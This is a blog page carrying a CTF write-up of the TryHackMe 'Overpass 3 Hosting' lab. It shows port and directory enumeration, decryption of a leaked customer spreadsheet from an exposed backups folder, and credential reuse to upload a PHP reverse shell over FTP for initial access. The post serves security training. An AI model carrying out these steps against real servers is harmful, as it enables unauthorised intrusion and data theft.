<!doctype html><html lang="en" data-mode="dark"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="theme-color" media="(prefers-color-scheme: light)" content="#f7f7f7"><meta name="theme-color" media="(prefers-color-scheme: dark)" content="#1b1b1e"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black-translucent"><meta name="viewport" content="width=device-width, user-scalable=no initial-scale=1, shrink-to-fit=no, viewport-fit=cover" ><meta name="generator" content="Jekyll v4.3.4" /><meta property="og:title" content="Overpass 3 Hosting" /><meta name="author" content="Ibrahim" /><meta property="og:locale" content="en" /><meta name="description" content="You know them, you love them, your favourite group of broke computer science students have another business venture! Show them that they probably should hire someone for security…" /><meta property="og:description" content="You know them, you love them, your favourite group of broke computer science students have another business venture! Show them that they probably should hire someone for security…" /><link rel="canonical" href="/posts/overpass-3-hosting/" /><meta property="og:url" content="/posts/overpass-3-hosting/" /><meta property="og:site_name" content="Ibrahim EO." /><meta property="og:type" content="article" /><meta property="article:published_time" content="2024-03-13T00:00:00+01:00" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="Overpass 3 Hosting" /><meta name="twitter:site" content="@twitter_username" /><meta name="twitter:creator" content="@Ibrahim" /> <script type="application/ld+json"> {"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"Ibrahim"},"dateModified":"2024-10-27T16:42:28+01:00","datePublished":"2024-03-13T00:00:00+01:00","description":"You know them, you love them, your favourite group of broke computer science students have another business venture! Show them that they probably should hire someone for security…","headline":"Overpass 3 Hosting","mainEntityOfPage":{"@type":"WebPage","@id":"/posts/overpass-3-hosting/"},"url":"/posts/overpass-3-hosting/"}</script><title>Overpass 3 Hosting | Ibrahim EO.</title><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/site.webmanifest"><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico"><meta name="apple-mobile-web-app-title" content="Ibrahim EO."><meta name="application-name" content="Ibrahim EO."><meta name="msapplication-TileColor" content="#da532c"><meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link rel="dns-prefetch" href="https://fonts.gstatic.com" ><link rel="preconnect" href="https://cdn.jsdelivr.net" ><link rel="dns-prefetch" href="https://cdn.jsdelivr.net" ><link rel="stylesheet" href="/assets/css/elomarii-portfolio.css"><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato:wght@300;400&family=Source+Sans+Pro:wght@400;600;700;900&display=swap"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.5.2/css/all.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/tocbot@4.27.20/dist/tocbot.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/glightbox@3.3.0/dist/css/glightbox.min.css"> <script async src="https://www.googletagmanager.com/gtag/js?id=G-X4YT79QSQC"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'G-X4YT79QSQC'); </script><body><aside aria-label="Sidebar" id="sidebar" class="d-flex flex-column align-items-end"><header class="profile-wrapper"> <a href="/" id="avatar" class="rounded-circle"><img src="/assets/avatar.png" width="112" height="112" alt="avatar" onerror="this.style.display='none'"></a><h1 class="site-title"> <a href="/whoami">Ibrahim EO.</a></h1><p class="site-subtitle fst-italic mb-0">Information Systems Engineer / InfoSec Enthousiaste</p></header><nav class="flex-column flex-grow-1 w-100 ps-0"><ul class="nav"><li class="nav-item"> <a href="/" class="nav-link"> <i class="fa-fw fas fa-home"></i> <span>HOME</span> </a><li class="nav-item"> <a href="/projects/" class="nav-link"> <i class="fa-fw fas fa-bars-progress"></i> <span>PROJECTS</span> </a><li class="nav-item"> <a href="/blog/" class="nav-link"> <i class="fa-fw fas fa-newspaper"></i> <span>BLOG</span> </a><li class="nav-item"> <a href="/tags/" class="nav-link"> <i class="fa-fw fas fa-tags"></i> <span>TAGS</span> </a><li class="nav-item"> <a href="/whoami/" class="nav-link"> <i class="fa-fw fas fa-chess-rook"></i> <span>WHOAMI</span> </a></ul></nav><div class="sidebar-bottom d-flex flex-wrap align-items-center w-100"> <a href="https://github.com/elomarii" aria-label="github" target="_blank" rel="noopener noreferrer" > <i class="fab fa-github"></i> </a> <a href="https://www.linkedin.com/in/ibrahim-el-omari/" aria-label="linkedin" target="_blank" rel="noopener noreferrer" > <i class="fab fa-linkedin"></i> </a> <a href="javascript:location.href = 'mailto:' + ['i.ibrahim.elomari','gmail.com'].join('@')" aria-label="email" > <i class="fas fa-envelope"></i> </a></div></aside><div id="main-wrapper" class="d-flex justify-content-center"><div class="container d-flex flex-column px-xxl-5"><header id="topbar-wrapper" aria-label="Top Bar"><div id="topbar" class="d-flex align-items-center justify-content-between px-lg-3 h-100" ><nav id="breadcrumb" aria-label="Breadcrumb"> <span> <a href="/">Home</a> </span> <span>Overpass 3 Hosting</span></nav><button type="button" id="sidebar-trigger" class="btn btn-link"> <i class="fas fa-bars fa-fw"></i> </button><div id="topbar-title"> Post</div><button type="button" id="search-trigger" class="btn btn-link"> <i class="fas fa-search fa-fw"></i> </button> <search id="search" class="align-items-center ms-3 ms-lg-0"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" autocomplete="off" placeholder="Search..." > </search> <button type="button" class="btn btn-link text-decoration-none" id="search-cancel">Cancel</button></div></header><div class="row flex-grow-1"><main aria-label="Main Content" class="col-12 col-lg-11 col-xl-9 px-md-4"><article class="px-1"><header><h1 data-toc-skip>Overpass 3 Hosting</h1><p class="post-desc fw-light mb-4">You know them, you love them, your favourite group of broke computer science students have another business venture! Show them that they probably should hire someone for security...</p><div class="post-meta text-muted"> <span> Posted <time data-ts="1710284400" data-df="ll" data-bs-toggle="tooltip" data-bs-placement="bottom" > Mar 13, 2024 </time> </span><div class="d-flex justify-content-between"> <span> By <em> Ibrahim </em> </span><div> <span class="readtime" data-bs-toggle="tooltip" data-bs-placement="bottom" title="487 words" > <em>2 min</em> read</span></div></div></div></header><div class="content"><blockquote class="prompt-info"><p>After Overpass’s rocky start in infosec, and the commercial failure of their password manager and subsequent hack, they’ve decided to try a new business venture.</p><p>Overpass has become a web hosting company!<br /> Unfortunately, they haven’t learned from their past mistakes. Rumour has it, their main web server is extremely vulnerable.</p></blockquote><p>As usual, we start by checking open services on the target machine:</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre><td class="rouge-code"><pre>$ sudo nmap -sV &lt;target_ip&gt; -Pn -n --disable-arp-ping  

&lt;...snip...&gt;
Host is up (0.042s latency).
Not shown: 986 filtered tcp ports (no-response), 11 filtered tcp ports (admin-prohibited)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.0 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.37 ((centos))
</pre></table></code></div></div><p>We can try connect anonymously to the FTP server, but this doesn’t work. We continue by enumerating the web app:</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
</pre><td class="rouge-code"><pre>$ ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt:FUZZ -u http://&lt;target_ip&gt;/FUZZ

&lt;...snip...&gt;
.hta                    [Status: 403, Size: 213, Words: 16, Lines: 10, Duration: 41ms]
.htaccess               [Status: 403, Size: 218, Words: 16, Lines: 10, Duration: 46ms]
.htpasswd               [Status: 403, Size: 218, Words: 16, Lines: 10, Duration: 45ms]
backups                 [Status: 301, Size: 236, Words: 14, Lines: 8, Duration: 38ms]
cgi-bin/                [Status: 403, Size: 217, Words: 16, Lines: 10, Duration: 41ms]
index.html              [Status: 200, Size: 1770, Words: 443, Lines: 37, Duration: 36ms]
:: Progress: [4727/4727] :: Job [1/1] :: 975 req/sec :: Duration: [0:00:05] :: Errors: 0 ::
</pre></table></code></div></div><p>The backups directory looks interesting.<br /> There we find an downloadable zip file. This file contains a PGP key and an encrypted <code class="language-plaintext highlighter-rouge">xlsx</code> document:</p><p><a href="https://github.com/elomarii/CTF_4_DAY/assets/106914699/eb1a77ec-5001-4cd8-b8f1-ca79b8f29e8d" class="popup img-link shimmer"><img src="https://github.com/elomarii/CTF_4_DAY/assets/106914699/eb1a77ec-5001-4cd8-b8f1-ca79b8f29e8d" alt="image" loading="lazy"></a></p><p><a href="https://github.com/elomarii/CTF_4_DAY/assets/106914699/b59e2b4e-c657-45c2-a05f-814279688639" class="popup img-link shimmer"><img src="https://github.com/elomarii/CTF_4_DAY/assets/106914699/b59e2b4e-c657-45c2-a05f-814279688639" alt="image" loading="lazy"></a></p><p>We can decrypt our <code class="language-plaintext highlighter-rouge">xlsx</code> file using that key. The process is pretty straight forward:</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
</pre><td class="rouge-code"><pre>$ gpg --import priv.key

gpg: key C9AE71AB3180BC08: public key "Paradox &lt;paradox@overpass.thm&gt;" imported
gpg: key C9AE71AB3180BC08: secret key imported
gpg: Total number processed: 1
gpg:               imported: 1
gpg:       secret keys read: 1
gpg:   secret keys imported: 1
                                                                                              
$ gpg --decrypt CustomerDetails.xlsx.gpg &gt; CustumerDetails.xlsx
</pre></table></code></div></div><p>Once decrypted, we find that it contains sensitive information about some users.</p><p><a href="https://github.com/elomarii/CTF_4_DAY/assets/106914699/8518a7cf-3dc2-4fdd-a342-bfd1c62bccd6" class="popup img-link shimmer"><img src="https://github.com/elomarii/CTF_4_DAY/assets/106914699/8518a7cf-3dc2-4fdd-a342-bfd1c62bccd6" alt="image" loading="lazy"></a></p><p>These credentials are important and in our case can be used to connect to ssh and/or ftp servers. That being said, the only credentials that prove to be useful are those belonging to Paradox. We can use then to connect to FTP. Once connected, we upload a php reverse shell to the server and then access from the web app:</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
</pre><td class="rouge-code"><pre>$ ftp paradox@&lt;target_ip&gt;      

Connected to &lt;target_ip&gt;.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password: 
230 Login successful.

ftp&gt; put php-reverse-shell.php
local: php-reverse-shell.php remote: php-reverse-shell.php
229 Entering Extended Passive Mode (|||28139|)
150 Ok to send data.
100% |*************************************************|  5492        1.00 MiB/s    00:00 ETA
226 Transfer complete.
5492 bytes sent in 00:00 (63.89 KiB/s)
</pre></table></code></div></div><p>Now we got initial access to the machine as the user <code class="language-plaintext highlighter-rouge">apache</code>. The web flag is at <code class="language-plaintext filepath highlighter-rouge">/usr/share/httpd</code>.</p></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw me-1"></i> <a href="/blog/ctf-writeups/">CTF Writeups</a>, <a href="/blog/tryhackme/">TryHackMe</a>, <a href="/blog/overpass-series/">Overpass Series</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw me-1"></i> <a href="/tags/gpg/" class="post-tag no-text-decoration" >GPG</a></div><div class=" post-tail-bottom d-flex justify-content-between align-items-center mt-5 pb-2 " ><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/"> CC BY 4.0 </a> by the author.</div><div class="share-wrapper d-flex align-items-center"> <span class="share-label text-muted">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=Overpass%203%20Hosting%20-%20Ibrahim%20EO.&url=%2Fposts%2Foverpass-3-hosting%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Twitter" aria-label="Twitter"> <i class="fa-fw fa-brands fa-square-x-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=Overpass%203%20Hosting%20-%20Ibrahim%20EO.&u=%2Fposts%2Foverpass-3-hosting%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Facebook" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://t.me/share/url?url=%2Fposts%2Foverpass-3-hosting%2F&text=Overpass%203%20Hosting%20-%20Ibrahim%20EO." target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Telegram" aria-label="Telegram"> <i class="fa-fw fab fa-telegram"></i> </a> <button id="copy-link" aria-label="Copy link" class="btn small" data-bs-toggle="tooltip" data-bs-placement="top" title="Copy link" data-title-succeed="Link copied successfully!" > <i class="fa-fw fas fa-link pe-none fs-6"></i> </button> </span></div></div></div></article></main><aside aria-label="Panel" id="panel-wrapper" class="col-xl-3 ps-2 mb-5 text-muted"><div class="access"><section id="access-lastmod"><h2 class="panel-heading">Recently Updated</h2><ul class="content list-unstyled ps-0 pb-1 ms-1 mt-2"><li class="text-truncate lh-lg"> <a href="/posts/boogyman/">Boogeyman</a><li class="text-truncate lh-lg"> <a href="/posts/itsy-bitsy/">ItsyBitsy</a><li class="text-truncate lh-lg"> <a href="/posts/benign/">Benign</a><li class="text-truncate lh-lg"> <a href="/posts/overpass/">Overpass</a><li class="text-truncate lh-lg"> <a href="/posts/overpass-2-hacked/">Overpass 2 Hacked</a></ul></section><section><h2 class="panel-heading">Trending Tags</h2><div class="d-flex flex-wrap mt-3 mb-1 me-3"> <a class="post-tag btn btn-outline-primary" href="/tags/cryptography/">Cryptography</a> <a class="post-tag btn btn-outline-primary" href="/tags/dfir/">DFIR</a> <a class="post-tag btn btn-outline-primary" href="/tags/john/">john</a> <a class="post-tag btn btn-outline-primary" href="/tags/wireshark/">Wireshark</a> <a class="post-tag btn btn-outline-primary" href="/tags/gpg/">GPG</a> <a class="post-tag btn btn-outline-primary" href="/tags/apache2/">Apache2</a> <a class="post-tag btn btn-outline-primary" href="/tags/aws/">AWS</a> <a class="post-tag btn btn-outline-primary" href="/tags/binwalk/">binwalk</a> <a class="post-tag btn btn-outline-primary" href="/tags/borg/">borg</a> <a class="post-tag btn btn-outline-primary" href="/tags/c/">C</a></div></section></div></aside></div><div class="row"><div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 px-md-4"><aside id="related-posts" aria-labelledby="related-label"><h3 class="mb-4" id="related-label">Further Reading</h3><nav class="row row-cols-1 row-cols-md-2 row-cols-xl-3 g-4 mb-4"><article class="col"> <a href="/posts/tomghost/" class="post-preview card h-100"><div class="card-body"> <time data-ts="1708470000" data-df="ll" > Feb 21, 2024 </time><h4 class="pt-0 my-2">Tomghost</h4><div class="text-muted"><p>Identify recent vulnerabilities to try exploit the system or read files that you should not have access to.</p></div></div></a></article><article class="col"> <a href="/posts/overpass-2-hacked/" class="post-preview card h-100"><div class="card-body"> <time data-ts="1710198000" data-df="ll" > Mar 12, 2024 </time><h4 class="pt-0 my-2">Overpass 2 Hacked</h4><div class="text-muted"><p>Overpass has been hacked! The SOC team (Paradox, congratulations on the promotion) noticed suspicious activity on a late night shift while looking at shibes, and managed to capture packets as the a...</p></div></div></a></article><article class="col"> <a href="/posts/overpass/" class="post-preview card h-100"><div class="card-body"> <time data-ts="1710025200" data-df="ll" > Mar 10, 2024 </time><h4 class="pt-0 my-2">Overpass</h4><div class="text-muted"><p>What happens when a group of broke Computer Science students try to make a password manager? Obviously a perfect commercial success!</p></div></div></a></article></nav></aside><nav class="post-navigation d-flex justify-content-between" aria-label="Post Navigation"> <a href="/posts/overpass-2-hacked/" class="btn btn-outline-primary" aria-label="Older" ><p>Overpass 2 Hacked</p></a> <a href="/projects/attack-titan/" class="btn btn-outline-primary" aria-label="Newer" ><p>The Attack Titan</p></a></nav><footer aria-label="Site Info" class=" d-flex flex-column justify-content-center text-muted flex-lg-row justify-content-lg-between align-items-lg-center pb-lg-3 " ><p>© <time>2024</time> <a href="https://github.com/elomarii">Ibrahim El Omari</a>. <span data-bs-toggle="tooltip" data-bs-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author." >Some rights reserved.</span></p><p>Using the <a data-bs-toggle="tooltip" data-bs-placement="top" title="v7.0.1" href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener" >Chirpy</a> theme for <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a>.</p></footer></div></div><div id="search-result-wrapper" class="d-flex justify-content-center d-none"><div class="col-11 content"><div id="search-hints"><section><h2 class="panel-heading">Trending Tags</h2><div class="d-flex flex-wrap mt-3 mb-1 me-3"> <a class="post-tag btn btn-outline-primary" href="/tags/cryptography/">Cryptography</a> <a class="post-tag btn btn-outline-primary" href="/tags/dfir/">DFIR</a> <a class="post-tag btn btn-outline-primary" href="/tags/john/">john</a> <a class="post-tag btn btn-outline-primary" href="/tags/wireshark/">Wireshark</a> <a class="post-tag btn btn-outline-primary" href="/tags/gpg/">GPG</a> <a class="post-tag btn btn-outline-primary" href="/tags/apache2/">Apache2</a> <a class="post-tag btn btn-outline-primary" href="/tags/aws/">AWS</a> <a class="post-tag btn btn-outline-primary" href="/tags/binwalk/">binwalk</a> <a class="post-tag btn btn-outline-primary" href="/tags/borg/">borg</a> <a class="post-tag btn btn-outline-primary" href="/tags/c/">C</a></div></section></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><aside aria-label="Scroll to Top"> <button id="back-to-top" type="button" class="btn btn-lg btn-box-shadow"> <i class="fas fa-angle-up"></i> </button></aside></div><div id="mask"></div><aside id="notification" class="toast" role="alert" aria-live="assertive" aria-atomic="true" data-bs-animation="true" data-bs-autohide="false" ><div class="toast-header"> <button type="button" class="btn-close ms-auto" data-bs-dismiss="toast" aria-label="Close" ></button></div><div class="toast-body text-center pt-0"><p class="px-2 mb-3">A new version of content is available.</p><button type="button" class="btn btn-primary" aria-label="Update"> Update </button></div></aside><script src="https://cdn.jsdelivr.net/combine/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js,npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.umd.min.js,npm/glightbox@3.3.0/dist/js/glightbox.min.js,npm/clipboard@2.0.11/dist/clipboard.min.js,npm/dayjs@1.11.11/dayjs.min.js,npm/dayjs@1.11.11/locale/en.min.js,npm/dayjs@1.11.11/plugin/relativeTime.min.js,npm/dayjs@1.11.11/plugin/localizedFormat.min.js"></script> <script src="/assets/js/dist/post.min.js"></script> <script defer src="/app.min.js"></script> <script>SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<article class="px-1 px-sm-2 px-lg-4 px-xl-0"><header><h2><a href="{url}">{title}</a></h2><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"> {categories} {tags}</div></header><p>{snippet}</p></article>', noResultsText: '<p class="mt-5">Oops! No results found.</p>', templateMiddleware: function(prop, value, template) { if (prop === 'categories') { if (value === '') { return `${value}`; } else { return `<div class="me-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`; } } if (prop === 'tags') { if (value === '') { return `${value}`; } else { return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`; } } } }); </script>
